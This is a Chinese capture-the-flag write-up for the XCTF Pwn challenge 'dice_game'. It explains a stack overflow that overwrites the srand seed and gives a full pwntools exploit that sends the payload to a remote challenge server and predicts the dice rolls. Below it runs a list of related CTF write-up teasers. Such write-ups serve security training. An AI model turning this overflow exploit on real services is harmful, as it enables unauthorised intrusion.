攻防世界(Pwn)dice_game, 栈溢出覆盖srand种子
说明
这其实是一种类型题,新手刚开始会碰到,题目大致过程是 有个srand()的随机函数.需要覆盖 seed种子
即srand(seed) 把 seed 覆盖为一个固定的数 , srand 就是伪随机函数了, 题目会有个猜数循
环,比如猜对了20次flag就有了,和这道题类似的题目还有新手区的guess_num
解题
点进去read中的 buf;
EXp
from pwn import *
from ctypes import *
p=remote('111.200.241.244','38298')
libc = cdll.LoadLibrary("libc.so.6")
p.recvuntil("Welcome, let me know your name: ")
payload=0x40*"a"+p64(0)
p.sendline(payload)
libc.srand(0)
for i in range(50):p.recvuntil("Give me the point(1~6): ")p.sendline(str(libc.rand()%6+1))
p.interactive()
这里EXP中的语句就不多解释
攻防世界(Pwn)dice_game, 栈溢出覆盖srand种子相关推荐
- [攻防世界 pwn]——dice_game
[攻防世界 pwn]--dice_game 题目地址: https://adworld.xctf.org.cn/ 题目: 思路 该题和前面的guess_num差不多, 可以点击查看 请点击.这道题是, ...
- 攻防世界(Pwn) forgot---栈溢出;(方法二)
攻防世界(Pwn) forgot-栈溢出:(方法一) 里面对问题描述的更详细一点 返回目标函数 0x80486CC 方法二(爆破流) 因为最终返回的是 v3[0]-v3[9] 之中的一个函数, v3[ ...
- 攻防世界(Pwn) forgot---栈溢出;(方法一)
攻防世界(Pwn) forgot-栈溢出:(方法二) 介绍 这道题表面看起来有点复杂,其实很简单,有两种方法可以来做这一道题; 方法一(精确打击) 文件运行流程是: 1.先输入名字 2. 输入一串字符 ...
- 【pwn】攻防世界 pwn新手区wp
[pwn]攻防世界 pwn新手区wp 前言 这几天恶补pwn的各种知识点,然后看了看攻防世界的pwn新手区没有堆题(堆才刚刚开始看),所以就花了一晚上的时间把新手区的10题给写完了. 1.get_sh ...
- 攻防世界 Pwn 进阶 第二页
00 这文章更重要的是对这些题进行一个总结,说一些值得注意的地方,写一些自己的理解. 为了形成一个体系,想将前面学过的一些东西都拉来放在一起总结总结,方便学习,方便记忆. 攻防世界 Pwn 新手 攻防 ...
- 攻防世界 Pwn 进阶 第一页
00 要把它跟之前新手区的放在一起总结,先稍稍回顾一下新手区. 攻防世界 Pwn 新手 1.栈溢出,从简单到难,开始有后门函数,到需要自己写函数参数,到最后的ret2libc. 常见漏洞点有read( ...
- [攻防世界 pwn]——pwn1(内涵peak小知识)
[攻防世界 pwn]--pwn1 题目地址:https://adworld.xctf.org.cn/ 题目: peak小知识 这道题目的关键就是泄露canary,通常我们泄露canary有两种方法,遇 ...
- [攻防世界 pwn]——forgot
[攻防世界 pwn]--forgot 题目地址: https://adworld.xctf.org.cn/ 题目: 在checksec看下保护 在IDA中, 竟然有后面函数, 找到sub_80486C ...
- [攻防世界 pwn]——guess_num
[攻防世界 pwn]--guess_num 题目地址: https://adworld.xctf.org.cn/ 题目: checksec一下,开启了NX, canary, PIE 好家伙 在IDA中 ...
最新文章
- Hadoop入门进阶步步高(一)-环境准备
- C++Builder如何响应消息及自定义消息
- 我也来记录我的一些开发心得和笔记!
- Hexo多客户端同步问题
- Bailian4073 最长公共字符串后缀【文本处理】
- 突然发现,工作已满四年了
- html+css制作一个浪漫爱心表白网页 表白网页在线制作 最浪漫的表白网页
- Java的三种技术架构是什么?
- MATLAB以符号形式表示门函数的傅里叶正反变换。
- python的encode方法_Python encode() 方法
- 手机浏览器类型( user agent)判断
- 我的Effective C++读书笔记
- 系统检测到您疑似使用网页抓取工具访问本_12款最常使用的网络爬虫工具推荐...
- 【SQL】关于SQL Server的性能优化——基础内容
- 联想笔记本电脑键盘灯怎么开启_联想的键盘灯怎么开_联想笔记本键盘亮灯按哪个键-win7之家...
- QT驾校科目考试系统——从实现到发布
- 骑士周游 探索访问
- IDEA向前向后箭头,左右箭头如何设置
- ASCII,UTF,GBK 是什么
- 函数可导但是导函数不连续的例子
热门文章
[攻防世界 pwn]--dice_game 题目地址: https://adworld.xctf.org.cn/ 题目: 思路 该题和前面的guess_num差不多, 可以点击查看 请点击.这道题是, ...
攻防世界(Pwn) forgot-栈溢出:(方法一) 里面对问题描述的更详细一点 返回目标函数 0x80486CC 方法二(爆破流) 因为最终返回的是 v3[0]-v3[9] 之中的一个函数, v3[ ...
攻防世界(Pwn) forgot-栈溢出:(方法二) 介绍 这道题表面看起来有点复杂,其实很简单,有两种方法可以来做这一道题; 方法一(精确打击) 文件运行流程是: 1.先输入名字 2. 输入一串字符 ...
[pwn]攻防世界 pwn新手区wp 前言 这几天恶补pwn的各种知识点,然后看了看攻防世界的pwn新手区没有堆题(堆才刚刚开始看),所以就花了一晚上的时间把新手区的10题给写完了. 1.get_sh ...
00 这文章更重要的是对这些题进行一个总结,说一些值得注意的地方,写一些自己的理解. 为了形成一个体系,想将前面学过的一些东西都拉来放在一起总结总结,方便学习,方便记忆. 攻防世界 Pwn 新手 攻防 ...
00 要把它跟之前新手区的放在一起总结,先稍稍回顾一下新手区. 攻防世界 Pwn 新手 1.栈溢出,从简单到难,开始有后门函数,到需要自己写函数参数,到最后的ret2libc. 常见漏洞点有read( ...
[攻防世界 pwn]--pwn1 题目地址:https://adworld.xctf.org.cn/ 题目: peak小知识 这道题目的关键就是泄露canary,通常我们泄露canary有两种方法,遇 ...
[攻防世界 pwn]--forgot 题目地址: https://adworld.xctf.org.cn/ 题目: 在checksec看下保护 在IDA中, 竟然有后面函数, 找到sub_80486C ...
[攻防世界 pwn]--guess_num 题目地址: https://adworld.xctf.org.cn/ 题目: checksec一下,开启了NX, canary, PIE 好家伙 在IDA中 ...